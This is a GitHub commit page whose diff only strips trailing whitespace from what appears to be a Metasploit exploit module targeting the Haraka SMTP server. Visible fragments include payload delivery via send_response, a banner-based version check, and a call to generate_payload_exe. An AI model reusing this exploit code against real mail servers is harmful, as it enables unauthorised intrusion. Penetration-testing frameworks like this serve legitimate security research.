Skip to content

Commit 40f82ba

Browse files
authored
removed spaces
1 parent ebde165 commit 40f82ba

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/linux/smtp/harakiri.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -89,7 +89,7 @@ def on_request_uri(cli, request)
8989
@elf_sent = true
9090
send_response(cli, @pl)
9191
end
92-
92+
9393
def check
9494
if datastore['SkipVersionCheck'] and self.banner.to_s !~ /Haraka /
9595
return Exploit::CheckCode::Detected
@@ -98,7 +98,7 @@ def check
9898
end
9999
Exploit::CheckCode::Safe
100100
end
101-
101+
102102
def exploit
103103
@pl = generate_payload_exe
104104
@elf_sent = false

0 commit comments

Comments
 (0)